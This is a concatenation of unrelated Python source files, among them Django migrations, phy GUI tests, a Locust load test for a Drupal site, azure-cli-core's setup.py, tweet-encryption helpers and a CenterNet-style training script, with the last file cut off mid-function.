selection = range(len(epochs))
epochs.selection = selection
epochs.drop_log = drop_log
fid.close()
return epochs
def bootstrap(epochs, random_state=None):
"""Compute epochs selected by bootstrapping
Parameters
----------
epochs : Epochs instance
epochs data to be bootstrapped
random_state : None | int | np.random.RandomState
To specify the random generator state
Returns
-------
epochs : Epochs instance
The bootstrap samples
"""
if not epochs.preload:
raise RuntimeError('Modifying data of epochs is only supported '
'when preloading is used. Use preload=True '
'in the constructor.')
rng = check_random_state(random_state)
epochs_bootstrap = epochs.copy()
n_events = len(epochs_bootstrap.events)
idx = rng.randint(0, n_events, n_events)
epochs_bootstrap = epochs_bootstrap[idx]
return epochs_bootstrap
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('user', '0001_initial'),
('goods', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='OrderGoods',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateTimeField(verbose_name='更新时间', auto_now=True)),
('id_delete', models.BooleanField(verbose_name='删除标记', default=False)),
('count', models.IntegerField(verbose_name='商品数目', default=1)),
('price', models.DecimalField(max_digits=10, verbose_name='商品价格', decimal_places=2)),
('comment', models.CharField(verbose_name='评论', max_length=256)),
],
options={
'verbose_name': '订单商品',
'verbose_name_plural': '订单商品',
'db_table': 'df_order_goods',
},
),
migrations.CreateModel(
name='OrderInfo',
fields=[
('create_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateTimeField(verbose_name='更新时间', auto_now=True)),
('id_delete', models.BooleanField(verbose_name='删除标记', default=False)),
('order_id', models.CharField(serialize=False, verbose_name='订单id', max_length=128, primary_key=True)),
('pay_method', models.SmallIntegerField(verbose_name='支付方式', choices=[(1, '货到付款'), (2, '微信支付'), (3, '支付宝'), (4, '银联支付')], default=3)),
('total_count', models.IntegerField(verbose_name='商品数量', default=1)),
('total_price', models.DecimalField(max_digits=10, verbose_name='商品总价', decimal_places=2)),
('transit_price', models.DecimalField(max_digits=10, verbose_name='订单运费', decimal_places=2)),
('order_status', models.SmallIntegerField(verbose_name='订单状态', choices=[(1, '待支付'), (2, '待发货'), (3, '待收货'), (4, '待评价'), (5, '已完成')], default=1)),
('trade_no', models.CharField(verbose_name='支付编号', max_length=128)),
('addr', models.ForeignKey(to='user.Address', verbose_name='地址')),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL, verbose_name='用户')),
],
options={
'verbose_name': '订单',
'verbose_name_plural': '订单',
'db_table': 'df_order_info',
},
),
migrations.AddField(
model_name='ordergoods',
name='order',
field=models.ForeignKey(to='order.OrderInfo', verbose_name='订单'),
),
migrations.AddField(
model_name='ordergoods',
name='sku',
field=models.ForeignKey(to='goods.GoodsSKU', verbose_name='商品SKU'),
),
]
|
# -*- coding: utf-8 -*-
"""Integration tests for the GUIs."""
#------------------------------------------------------------------------------
# Imports
#------------------------------------------------------------------------------
from itertools import cycle, islice
import logging
import os
from pathlib import Path
import shutil
import tempfile
import unittest
import numpy as np
from pytestqt.plugin import QtBot
from phylib.io.mock import (
artificial_features, artificial_traces, artificial_spike_clusters, artificial_spike_samples,
artificial_waveforms
)
from phylib.utils import connect, unconnect, Bunch, reset, emit
from phy.cluster.views import (
WaveformView, FeatureView, AmplitudeView, TraceView, TemplateView,
)
from phy.gui.qt import Debouncer, create_app
from phy.gui.widgets import Barrier
from phy.plot.tests import mouse_click
from ..base import BaseController, WaveformMixin, FeatureMixin, TraceMixin, TemplateMixin
logger = logging.getLogger(__name__)
#------------------------------------------------------------------------------
# Mock models and controller classes
#------------------------------------------------------------------------------
class MyModel(object):
seed = np.random.seed(0)
n_channels = 8
n_spikes = 20000
n_clusters = 32
n_templates = n_clusters
n_pcs = 5
n_samples_waveforms = 100
channel_positions = np.random.normal(size=(n_channels, 2))
channel_mapping = np.arange(0, n_channels)
channel_shanks = np.zeros(n_channels, dtype=np.int32)
features = artificial_features(n_spikes, n_channels, n_pcs)
metadata = {'group': {3: 'noise', 4: 'mua', 5: 'good'}}
sample_rate = 10000
spike_attributes = {}
amplitudes = np.random.normal(size=n_spikes, loc=1, scale=.1)
spike_clusters = artificial_spike_clusters(n_spikes, n_clusters)
spike_templates = spike_clusters
spike_samples = artificial_spike_samples(n_spikes)
spike_times = spike_samples / sample_rate
spike_times_reordered = artificial_spike_samples(n_spikes) / sample_rate
duration = spike_times[-1]
spike_waveforms = None
traces = artificial_traces(int(sample_rate * duration), n_channels)
def _get_some_channels(self, offset, size):
return list(islice(cycle(range(self.n_channels)), offset, offset + size))
def get_features(self, spike_ids, channel_ids):
return artificial_features(len(spike_ids), len(channel_ids), self.n_pcs)
def get_waveforms(self, spike_ids, channel_ids):
n_channels = len(channel_ids) if channel_ids else self.n_channels
return artificial_waveforms(len(spike_ids), self.n_samples_waveforms, n_channels)
def get_template(self, template_id):
nc = self.n_channels // 2
return Bunch(
template=artificial_waveforms(1, self.n_samples_waveforms, nc)[0, ...],
channel_ids=self._get_some_channels(template_id, nc))
def save_spike_clusters(self, spike_clusters):
pass
def save_metadata(self, name, values):
pass
class MyController(BaseController):
"""Default controller."""
def get_best_channels(self, cluster_id):
return self.model._get_some_channels(cluster_id, 5)
def get_channel_amplitudes(self, cluster_id):
return self.model._get_some_channels(cluster_id, 5), np.ones(5)
class MyControllerW(WaveformMixin, MyController):
"""With waveform view."""
pass
class MyControllerF(FeatureMixin, MyController):
"""With feature view."""
pass
class MyControllerT(TraceMixin, MyController):
"""With trace view."""
pass
class MyControllerTmp(TemplateMixin, MyController):
"""With templates."""
pass
class MyControllerFull(TemplateMixin, WaveformMixin, FeatureMixin, TraceMixin, MyController):
"""With everything."""
pass
def _mock_controller(tempdir, cls):
model = MyModel()
return cls(
dir_path=tempdir, config_dir=tempdir / 'config', model=model,
clear_cache=True, enable_threading=False)
#------------------------------------------------------------------------------
# Base classes
#------------------------------------------------------------------------------
class MinimalControllerTests(object):
# Methods to override
#--------------------------------------------------------------------------
@classmethod
def get_controller(cls, tempdir):
raise NotImplementedError()
# Convenient properties
#--------------------------------------------------------------------------
@property
def qtbot(self):
return self.__class__._qtbot
@property
def controller(self):
return self.__class__._controller
@property
def model(self):
return self.__class__._controller.model
@property
def supervisor(self):
return self.controller.supervisor
@property
def cluster_view(self):
return self.supervisor.cluster_view
@property
def similarity_view(self):
return self.supervisor.similarity_view
@property
def cluster_ids(self):
return self.supervisor.clustering.cluster_ids
@property
def gui(self):
return self.__class__._gui
@property
def selected(self):
return self.supervisor.selected
@property
def amplitude_view(self):
return self.gui.list_views(AmplitudeView)[0]
# Convenience methods
#--------------------------------------------------------------------------
def stop(self): # pragma: no cover
"""Used for debugging."""
create_app().exec_()
self.gui.close()
def next(self):
s = self.supervisor
s.select_actions.next()
s.block()
def next_best(self):
s = self.supervisor
s.select_actions.next_best()
s.block()
def label(self, name, value):
s = self.supervisor
s.actions.label(name, value)
s.block()
def merge(self):
s = self.supervisor
s.actions.merge()
s.block()
def split(self):
s = self.supervisor
s.actions.split()
s.block()
def undo(self):
s = self.supervisor
s.actions.undo()
s.block()
def redo(self):
s = self.supervisor
s.actions.redo()
s.block()
def move(self, w):
s = self.supervisor
getattr(s.actions, 'move_%s' % w)()
s.block()
def lasso(self, view, scale=1.):
w, h = view.canvas.get_size()
w *= scale
h *= scale
mouse_click(self.qtbot, view.canvas, (1, 1), modifiers=('Control',))
mouse_click(self.qtbot, view.canvas, (w - 1, 1), modifiers=('Control',))
mouse_click(self.qtbot, view.canvas, (w - 1, h - 1), modifiers=('Control',))
mouse_click(self.qtbot, view.canvas, (1, h - 1), modifiers=('Control',))
# Fixtures
#--------------------------------------------------------------------------
@classmethod
def setUpClass(cls):
Debouncer.delay = 1
cls._qtbot = QtBot(create_app())
cls._tempdir_ = tempfile.mkdtemp()
cls._tempdir = Path(cls._tempdir_)
cls._controller = cls.get_controller(cls._tempdir)
cls._create_gui()
@classmethod
def tearDownClass(cls):
if os.environ.get('PHY_TEST_STOP', None): # pragma: no cover
cls._qtbot.stop()
cls._close_gui()
shutil.rmtree(cls._tempdir_)
@classmethod
def _create_gui(cls):
cls._gui = cls._controller.create_gui(do_prompt_save=False)
s = cls._controller.supervisor
b = Barrier()
connect(b('cluster_view'), event='ready', sender=s.cluster_view)
connect(b('similarity_view'), event='ready', sender=s.similarity_view)
cls._gui.show()
# cls._qtbot.addWidget(cls._gui)
cls._qtbot.waitForWindowShown(cls._gui)
b.wait()
@classmethod
def _close_gui(cls):
cls._gui.close()
cls._gui.deleteLater()
# NOTE: make sure all callback functions are unconnected at the end of the tests
# to avoid side-effects and spurious dependencies between tests.
reset()
class BaseControllerTests(MinimalControllerTests):
# Common test methods
#--------------------------------------------------------------------------
def test_common_01(self):
"""Select one cluster."""
self.next_best()
self.assertEqual(len(self.selected), 1)
def test_common_02(self):
"""Select one similar cluster."""
self.next()
self.assertEqual(len(self.selected), 2)
def test_common_03(self):
"""Select another similar cluster."""
self.next()
self.assertEqual(len(self.selected), 2)
def test_common_04(self):
"""Merge the selected clusters."""
self.merge()
self.assertEqual(len(self.selected), 1)
def test_common_05(self):
"""Select a similar cluster."""
self.next()
self.assertEqual(len(self.selected), 2)
def test_common_06(self):
"""Undo/redo the merge several times."""
for _ in range(3):
self.undo()
self.assertEqual(len(self.selected), 2)
self.redo()
self.assertEqual(len(self.selected), 2)
def test_common_07(self):
"""Move action."""
self.move('similar_to_noise')
self.assertEqual(len(self.selected), 2)
def test_common_08(self):
"""Move action."""
self.move('best_to_good')
self.assertEqual(len(self.selected), 1)
def test_common_09(self):
"""Label action."""
self.next()
@connect(sender=self.supervisor)
def on_cluster(sender, up):
cls = self.__class__
cls._label_name, cls._label_value = 'new_label', up.metadata_value
self.label('new_label', 3)
unconnect(on_cluster)
def test_common_10(self):
self.supervisor.save()
def test_common_11(self):
s = self.controller.selection
self.assertEqual(s.cluster_ids, self.selected)
self.gui.view_actions.toggle_spike_reorder(True)
self.gui.view_actions.switch_raw_data_filter()
class GlobalViewsTests(object):
def test_global_filter_1(self):
self.next()
cv = self.supervisor.cluster_view
emit('table_filter', cv, self.cluster_ids[::2])
def test_global_sort_1(self):
cv = self.supervisor.cluster_view
emit('table_sort', cv, self.cluster_ids[::-1])
#------------------------------------------------------------------------------
# Mock test cases
#------------------------------------------------------------------------------
class MockControllerTests(MinimalControllerTests, GlobalViewsTests, unittest.TestCase):
"""Empty mock controller."""
@classmethod
def get_controller(cls, tempdir):
return _mock_controller(tempdir, MyController)
def test_create_ipython_view(self):
self.gui.create_and_add_view('IPythonView')
def test_create_raster_view(self):
view = self.gui.create_and_add_view('RasterView')
mouse_click(self.qtbot, view.canvas, (10, 10), modifiers=('Control',))
view.actions.next_color_scheme()
class MockControllerWTests(MinimalControllerTests, unittest.TestCase):
"""Mock controller with waveforms."""
@classmethod
def get_controller(cls, tempdir):
return _mock_controller(tempdir, MyControllerW)
@property
def waveform_view(self):
return self.gui.list_views(WaveformView)[0]
def test_waveform_view(self):
self.waveform_view.actions.toggle_mean_waveforms(True)
self.waveform_view.actions.next_waveforms_type()
self.waveform_view.actions.change_n_spikes_waveforms(200)
def test_mean_amplitudes(self):
self.next()
self.assertTrue(self.controller.get_mean_spike_raw_amplitudes(self.selected[0]) >= 0)
def test_waveform_select_channel(self):
self.amplitude_view.amplitudes_type = 'raw'
fv = self.waveform_view
# Select channel in waveform view.
w, h = fv.canvas.get_size()
w, h = w / 2, h / 2
x, y = w / 2, h / 2
mouse_click(self.qtbot, fv.canvas, (x, y), button='Left', modifiers=('Control',))
class MockControllerFTests(MinimalControllerTests, unittest.TestCase):
"""Mock controller with features."""
@classmethod
def get_controller(cls, tempdir):
return _mock_controller(tempdir, MyControllerF)
@property
def feature_view(self):
return self.gui.list_views(FeatureView)[0]
def test_feature_view_split(self):
self.next()
n = max(self.cluster_ids)
self.lasso(self.feature_view, .1)
self.split()
# Split one cluster => Two new clusters should be selected after the split.
self.assertEqual(self.selected[:2], [n + 1, n + 2])
def test_feature_view_toggle_spike_reorder(self):
self.gui.view_actions.toggle_spike_reorder(True)
def test_select_feature(self):
self.next()
fv = self.feature_view
# Select feature in feature view.
w, h = fv.canvas.get_size()
w, h = w / 4, h / 4
x, y = w / 2, h / 2
mouse_click(self.qtbot, fv.canvas, (x, y), button='Right', modifiers=('Alt',))
class MockControllerTTests(GlobalViewsTests, MinimalControllerTests, unittest.TestCase):
"""Mock controller with traces."""
@classmethod
def get_controller(cls, tempdir):
return _mock_controller(tempdir, MyControllerT)
@property
def trace_view(self):
return self.gui.list_views(TraceView)[0]
def test_trace_view(self):
self.trace_view.actions.go_to_next_spike()
self.trace_view.actions.go_to_previous_spike()
self.trace_view.actions.toggle_highlighted_spikes(True)
mouse_click(self.qtbot, self.trace_view.canvas, (100, 100), modifiers=('Control',))
mouse_click(self.qtbot, self.trace_view.canvas, (150, 100), modifiers=('Shift',))
emit('select_time', self, 0)
self.trace_view.actions.next_color_scheme()
class MockControllerTmpTests(MinimalControllerTests, unittest.TestCase):
"""Mock controller with templates."""
@classmethod
def get_controller(cls, tempdir):
return _mock_controller(tempdir, MyControllerTmp)
@property
def template_view(self):
return self.gui.list_views(TemplateView)[0]
def test_template_view_select(self):
mouse_click(self.qtbot, self.template_view.canvas, (100, 100), modifiers=('Control',))
mouse_click(self.qtbot, self.template_view.canvas, (150, 100), modifiers=('Shift',))
def test_mean_amplitudes(self):
self.next()
self.assertTrue(self.controller.get_mean_spike_template_amplitudes(self.selected[0]) >= 0)
def test_split_template_amplitude(self):
self.next()
self.amplitude_view.amplitudes_type = 'template'
self.controller.get_amplitudes(self.selected[0], load_all=True)
self.amplitude_view.plot()
self.lasso(self.amplitude_view)
self.split()
class MockControllerFullTests(MinimalControllerTests, unittest.TestCase):
"""Mock controller with all views."""
@classmethod
def get_controller(cls, tempdir):
return _mock_controller(tempdir, MyControllerFull)
def test_filter(self):
rdf = self.controller.raw_data_filter
@rdf.add_filter
def diff(arr, axis=0): # pragma: no cover
out = np.zeros_like(arr)
if axis == 0:
out[1:, ...] = np.diff(arr, axis=axis)
elif axis == 1:
out[:, 1:, ...] = np.diff(arr, axis=axis)
return out
self.gui.view_actions.switch_raw_data_filter()
self.gui.view_actions.switch_raw_data_filter()
rdf.set('diff')
assert rdf.current == 'diff'
def test_y1_close_view(self):
s = self.selected
self.next_best()
assert s != self.selected
fv = self.gui.get_view(FeatureView)
wv = self.gui.get_view(WaveformView)
assert self.selected == wv.cluster_ids
fv.dock.close()
s = self.selected
self.next_best()
assert s != self.selected
assert self.selected == wv.cluster_ids
def test_z1_close_all_views(self):
self.next()
for view in self.gui.views:
view.dock.close()
self.qtbot.wait(200)
def test_z2_open_all_views(self):
for view_cls in self.controller.view_creator.keys():
self.gui.create_and_add_view(view_cls)
self.qtbot.wait(200)
def test_z3_select(self):
self.next()
self.next()
def test_z4_open_new_views(self):
for view_cls in self.controller.view_creator.keys():
self.gui.create_and_add_view(view_cls)
self.qtbot.wait(200)
def test_z5_select(self):
self.next_best()
self.next()
|
from __future__ import annotations
from typing import TYPE_CHECKING
from datetime import datetime
from .hypyobject import HypyObject
from .uuid import UUID
from .hypixelplayer import HypixelPlayer
if TYPE_CHECKING:
from .player import Player
from .hypixelfriends import HypixelFriends
class HypixelFriend(HypyObject, HypixelPlayer):
"""A Hypixel Friend"""
__slots__ = ("_raw", "_hypy", "_id")
def __init__(self, raw, of, _hypy) -> None:
self._raw: dict = raw
self._hypy = _hypy
self.of = of
self._id = self._raw["_id"]
self.uuid = UUID(
self._raw["uuidReceiver"]
if of.no_dashes == self._raw["uuidSender"]
else self._raw["uuidSender"]
)
@property
def since(self) -> datetime:
"""Since when the friendship exists"""
return datetime.utcfromtimestamp(self._raw["started"] / 1000)
|
import sys
from CLI.app import run
def main():
run()
if __name__ == "__main__":
sys.exit(main() or 0)
|
from locust import HttpLocust, TaskSet, between
from bs4 import BeautifulSoup
from faker import Faker
import random, time
USER_CREDENTIALS = [
("thomaswolf", "thomaswolf"),
("susanwilliams", "susanwilliams"),
("student_01", "student_01"),
("shaunberkley", "shaunberkley"),
("robertandrews", "robertandrews"),
("petershaw", "petershaw"),
("paulharris", "paulharris"),
("michelleclark", "michelleclark"),
("ironman", "ironman"),
("EAA_official", "EAA_official"),
("chrishall", "chrishall"),
("alisonhendrix", "alisonhendrix"),
]
def is_static_file(f):
if "/sites/default/files" in f:
return True
else:
return False
def fetch_static_assets(session, response):
resource_urls = set()
soup = BeautifulSoup(response.text, "html.parser")
# Look through the code to find static assets that can be called.
for res in soup.find_all(src=True):
url = res['src']
if is_static_file(url):
resource_urls.add(url)
for url in set(resource_urls):
# Retrieve static files.
session.client.get(url, name="(Static File)")
def index(self):
# Go to the homepage and fetch static assets.
response = self.client.get("/")
fetch_static_assets(self, response)
def about(self):
# Go to the about page and fetch static assets.
response = self.client.get("/about")
fetch_static_assets(self, response)
def createTopic(self):
# Go to the add topic page and fetch static assets.
response = self.client.get("/node/add/topic")
fetch_static_assets(self, response)
# Find the Drupal form build id and token.
content = BeautifulSoup(response.content, "html.parser")
build_id = content.body.find('input', {'name': 'form_build_id'})['value']
form_token = content.body.find('input', {'data-drupal-selector': 'edit-node-topic-form-form-token'})['value']
# Submit the form.
fake = Faker()
response = self.client.post("/node/add/topic", {
"title[0][value]": fake.sentence(),
"body[0][value]": fake.text(),
"field_topic_type": 1,
"groups": "_none",
"field_content_visibility": "community",
"field_topic_comments[0][status]": 2,
"status[value]": 1,
"form_build_id": build_id,
"form_token": form_token,
"form_id": "node_topic_form",
"op": "Save"
})
fetch_static_assets(self, response)
def drupalLogin(self):
# Get a random user to login with.
username, password = random.choice(USER_CREDENTIALS)
# Go to the user login page and fetch static assets.
response = self.client.get("/user/login")
fetch_static_assets(self, response)
# Find the Drupal form build id.
content = BeautifulSoup(response.content, "html.parser")
build_id = content.body.find('input', {'name': 'form_build_id'})['value']
# Submit the login form.
response = self.client.post("/user/login", {
"name_or_mail": username,
"pass": password,
"form_id": "social_user_login_form",
"form_build_id": build_id,
"op": "Log in"
})
fetch_static_assets(self, response)
def drupalLogout(self):
# Go to the logout page and fetch static assets.
response = self.client.get("/user/logout")
fetch_static_assets(self, response)
class UserBehavior(TaskSet):
# Switch randomly between different tasks.
tasks = {index: 1, about: 1, createTopic: 1}
def on_start(self):
drupalLogin(self)
def on_stop(self):
drupalLogout(self)
class WebsiteUser(HttpLocust):
task_set = UserBehavior
wait_time = between(5.0, 9.0)
|
#!/usr/bin/env python
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
from codecs import open
from setuptools import setup
try:
from azure_bdist_wheel import cmdclass
except ImportError:
from distutils import log as logger
logger.warn("Wheel is not available, disabling bdist_wheel hook")
cmdclass = {}
VERSION = "2.0.50"
# If we have source, validate that our version numbers match
# This should prevent uploading releases with mismatched versions.
try:
with open('azure/cli/core/__init__.py', 'r', encoding='utf-8') as f:
content = f.read()
except OSError:
pass
else:
import re
import sys
m = re.search(r'__version__\s*=\s*[\'"](.+?)[\'"]', content)
if not m:
print('Could not find __version__ in azure/cli/core/__init__.py')
sys.exit(1)
if m.group(1) != VERSION:
print('Expected __version__ = "{}"; found "{}"'.format(VERSION, m.group(1)))
sys.exit(1)
CLASSIFIERS = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'License :: OSI Approved :: MIT License',
]
# TODO These dependencies should be updated to reflect only what this package needs
DEPENDENCIES = [
'adal>=1.2.0',
'argcomplete>=1.8.0',
'azure-cli-telemetry',
'colorama>=0.3.9',
'humanfriendly>=4.7',
'jmespath',
'knack==0.4.5',
'msrest>=0.4.4',
'msrestazure>=0.4.25',
'paramiko>=2.0.8',
'pip',
'pygments',
'PyJWT',
'pyopenssl>=17.1.0', # https://github.com/pyca/pyopenssl/pull/612
'pyyaml~=3.13',
'requests',
'six',
'tabulate>=0.7.7,<=0.8.2',
'wheel==0.30.0',
'azure-mgmt-resource==2.0.0'
]
with open('README.rst', 'r', encoding='utf-8') as f:
README = f.read()
with open('HISTORY.rst', 'r', encoding='utf-8') as f:
HISTORY = f.read()
setup(
name='azure-cli-core',
version=VERSION,
description='Microsoft Azure Command-Line Tools Core Module',
long_description=README + '\n\n' + HISTORY,
license='MIT',
author='Microsoft Corporation',
author_email='azpycli@microsoft.com',
url='https://github.com/Azure/azure-cli',
zip_safe=False,
classifiers=CLASSIFIERS,
packages=[
'azure',
'azure.cli',
'azure.cli.core',
'azure.cli.core.commands',
'azure.cli.core.extension',
'azure.cli.core.profiles',
],
install_requires=DEPENDENCIES,
extras_require={
":python_version<'3.4'": ['enum34'],
":python_version<'2.7.9'": ['pyopenssl', 'ndg-httpsclient', 'pyasn1'],
":python_version<'3.0'": ['antlr4-python2-runtime'],
":python_version>='3.0'": ['antlr4-python3-runtime']
},
package_data={'azure.cli.core': ['auth_landing_pages/*.html']},
cmdclass=cmdclass
)
|
from . import BaseModel
from busy_beaver.extensions import db
class GitHubSummaryUser(BaseModel):
"""GitHub Summary User table
TODO: GitHubSummaryUser should really be related to
GitHubSummaryConfiguration versus SlackInstallation
"""
__tablename__ = "github_summary_user"
def __repr__(self): # pragma: no cover
return f"<User slack: {self.slack_id} github: {self.github_username}>"
# Attributes
installation_id = db.Column(
db.Integer,
db.ForeignKey("slack_installation.id", name="fk_installation_id"),
nullable=False,
)
slack_id = db.Column(db.String(300), nullable=False)
github_id = db.Column(db.String(300), nullable=True)
github_username = db.Column(db.String(300), nullable=True)
github_state = db.Column(db.String(36), nullable=True)
github_access_token = db.Column(db.String(100), nullable=True)
# Relationships
installation = db.relationship(
"SlackInstallation", back_populates="github_summary_users"
)
class GitHubSummaryConfiguration(BaseModel):
__tablename__ = "github_summary_configuration"
def __repr__(self): # pragma: no cover
return f"<GitHubSummaryConfiguration>"
installation_id = db.Column(
db.Integer,
db.ForeignKey("slack_installation.id", name="fk_installation_id"),
nullable=False,
)
channel = db.Column(db.String(20), nullable=False)
time_to_post = db.Column(db.String(20), nullable=True)
timezone_info = db.Column(db.JSON)
# Relationships
slack_installation = db.relationship(
"SlackInstallation", back_populates="github_summary_config"
)
|
from Crypto.PublicKey import RSA
from Crypto.Cipher import AES
from Crypto.Cipher import PKCS1_OAEP
import os
import json
import base65536
# Have put in dodgy functions so that the base library can be changed.
def ByteToString(x):
return base65536.encode(x)
def StrToByte(x):
return base65536.decode(x)
# Encrypt message, and return AEs key and nocne
def EncryptText(msg,key=None):
# Generate random key if none given
if key is None:
key = os.urandom(16)
aesCipher = AES.new(key, AES.MODE_EAX)
cipherText, authTag = aesCipher.encrypt_and_digest(msg.encode())
return cipherText,key,aesCipher.nonce
def RetweetKeyAndNonce(publicKey_target,key,nonce):
encryptor = PKCS1_OAEP.new(publicKey_target)
key_encrypted = encryptor.encrypt(key)
nonce_encrypted = encryptor.encrypt(nonce)
return key_encrypted,nonce_encrypted
# Returns privateKey,publicKey from a PEM file
def LoadKeyPairPEM(path='./personalKey.pem'):
f = open(path,'r')
key = RSA.import_key(f.read())
return key.exportKey(),key.publickey().exportKey()
def LoadTargetJSON(path='./targetKeys.json'):
with open(path) as json_file:
data = json.load(json_file)
return data
def DecryptRetweet(rt,personalKey):
key_encrypted = rt.split(' ')[1]
nonce_encrypted = rt.split(' ')[-1]
decryptor = PKCS1_OAEP.new(personalKey)
key = decryptor.decrypt(bytes(StrToByte(key_encrypted)))
nonce = decryptor.decrypt(bytes(StrToByte(nonce_encrypted)))
return key,nonce
def DecryptTweet(twt,rtwt,personalKey):
key,nonce = DecryptRetweet(rtwt,personalKey)
aesCipher = AES.new(key,AES.MODE_EAX,nonce=nonce)
text = aesCipher.decrypt(StrToByte(twt))
return text
|
# Generated by Django 2.2.4 on 2019-11-23 05:13
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('api', '0002_posts'),
]
operations = [
migrations.RenameModel(
old_name='Posts',
new_name='Post',
),
]
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import _init_paths
import os
import torch
import torch.utils.data
from opts import opts
from models.model import create_model, load_model, save_model
from models.data_parallel import DataParallel
from logger import Logger
from datasets.dataset_factory import get_dataset
from trains.train_factory import train_factory
from mrc_utils.preprocess import process
def main(opt):
torch.manual_seed(opt.seed)
torch.backends.cudnn.benchmark = not opt.not_cuda_benchmark and not opt.test
Dataset = get_dataset(opt.dataset, opt.task)
opt = opts().update_dataset_info_and_set_heads(opt, Dataset)
print(opt)
logger = Logger(opt)
os.environ['CUDA_VISIBLE_DEVICES'] = opt.gpus_str
opt.device = torch.device('cuda' if opt.gpus[0] >= 0 else 'cpu')
print('Preprocessing data...')
mean, var = process(opt)
Dataset.mean = mean
Dataset.var = var
print('Creating model...')
model = create_model(opt.arch, opt.heads, opt.head_conv)
optimizer = torch.optim.Adam(model.parameters(), opt.lr)
start_epoch = 0
if opt.load_model != '':
model, optimizer, start_epoch = load_model(
model, opt.load_model, optimizer, opt.resume, opt.lr, opt.lr_step)
Trainer = train_factory[opt.task]
trainer = Trainer(opt, model, optimizer)
trainer.set_device(opt.gpus, opt.chunk_sizes, opt.device)
print('Setting up data...')
val_loader = torch.utils.data.DataLoader(
Dataset(opt, 'val'),
batch_size=1,
shuffle=False,
num_workers=1,
pin_memory=True
)
if opt.test:
_, preds = trainer.val(0, val_loader)
val_loader.dataset.run_eval(preds, opt.save_dir)
return
train_loader = torch.utils.data.DataLoader(
Dataset(opt, 'train'),
batch_size=opt.batch_size,
shuffle=True,
num_workers=opt.num_workers,
pin_memory=True,
drop_last=True
)
print('Starting training...')
best = 1e10
for epoch in range(start_epoch + 1, opt.num_epochs + 1):
mark = epoch if opt.save_all else 'last'
log_dict_train, _ = trainer.train(epoch, train_loader)
logger.write('epoch: {} |'.format(epoch))
for k, v in log_dict_train.items():
logger.scalar_summary('train_{}'.format(k), v, epoch)
logger.write('{} {:8f} | '.format(k, v))
if opt.val_intervals > 0 and epoch % opt.val_intervals == 0:
save_model(os.path.join(opt.save_dir, 'model_{}.pth'.format(mark)),
epoch, model, optimizer)
with torch.no_grad():
log_dict_val, preds = trainer.val(epoch, val_loader)
for k, v in log_dict_val.items():
logger.scalar_summary('val_{}'.format(k), v, epoch)
logger.write('{} {:8f} | '.format(k, v))
if log_dict_val[opt.metric] < best:
best = log_dict_val[opt.metric]
save_model(os.path.join(opt.save_dir, 'model_best.pth'),
epoch, model)
else:
save_model(os.path.join(opt.save_dir, 'model_last.pth'),
epoch, model, optimizer)
logger.write('\n')
if epoch in opt.lr_step:
save_model(os.path.join(opt.save_dir, 'model_{}.pth'.format(epoch)),
epoch, model, optimizer)
lr = opt.lr * (0.1 ** (opt.lr_step.index(epoch) + 1))
print('Drop LR to', lr)
for param_group in optimizer.param_groups:
param_group['lr'] = lr
logger.close()
if __name__ == '__main__':
opt = opts().parse()
main(opt)
|
# -*- coding: utf-8 -*-
'''
rauth.test_service_ofly
-----------------------
Test suite for rauth.service.OflyService.
'''
from base import RauthTestCase
from test_service import (FakeHexdigest, HttpMixin, MutableDatetime,
RequestMixin, ServiceMixin)
from rauth.compat import parse_qsl, urlsplit, is_basestring
from rauth.service import OflyService
from rauth.session import OFLY_DEFAULT_TIMEOUT, OflySession
from copy import deepcopy
from datetime import datetime
from functools import wraps
from mock import patch
import requests
import pickle
class OflyServiceTestCase(RauthTestCase, RequestMixin, ServiceMixin,
HttpMixin):
app_id = '000'
app_secret = '111'
user_id = '123'
def setUp(self):
RauthTestCase.setUp(self)
self.authorize_url = 'http://example.com/authorize'
self.base_url = 'http://example.com/api/'
self.service = OflyService(self.app_id,
self.app_secret,
name='service',
authorize_url=self.authorize_url,
base_url=self.base_url)
self.session = self.service.get_session(self.user_id)
# patch
self.session.request = self.fake_request
self.service.get_session = self.fake_get_session
def fake_get_sorted_params(self, params):
def sorting_gen():
for k in sorted(params.keys()):
yield '='.join((k, params[k]))
return '&'.join(sorting_gen())
def fake_sign(app_id, user_id):
def wrap(func):
@wraps(func)
@patch('rauth.session.datetime', MutableDatetime)
@patch('rauth.session.md5', FakeHexdigest)
@patch('rauth.session.sha1', FakeHexdigest)
def decorated(*args, **kwargs):
hash_meth = kwargs.get('hash_meth', 'sha1').upper()
ofly_params = {'oflyAppId': app_id,
'oflyHashMeth': hash_meth,
'oflyTimestamp': '1900-01-01T00:00:00.0Z',
'oflyApiSig': 'foo',
'oflyUserid': user_id}
MutableDatetime.utcnow = \
classmethod(lambda cls: datetime(1900, 1, 1))
return func(ofly_params=ofly_params, *args, **kwargs)
return decorated
return wrap
@patch.object(requests.Session, 'request')
@fake_sign(app_id, user_id)
def fake_request(self,
method,
url,
mock_request,
ofly_params,
user_id=None,
hash_meth='sha1',
**kwargs):
mock_request.return_value = self.response
user_id = user_id or self.service.user_id
service = OflyService(self.app_id,
self.app_secret,
name='service',
authorize_url=self.authorize_url,
base_url=self.base_url)
session = service.get_session(self.user_id)
r = session.request(method,
url,
user_id=user_id,
hash_meth=hash_meth,
**deepcopy(kwargs))
url = self.session._set_url(url)
kwargs.setdefault('params', {})
if is_basestring(kwargs['params']):
kwargs['params'] = dict(parse_qsl(kwargs['params']))
url_path = urlsplit(url).path
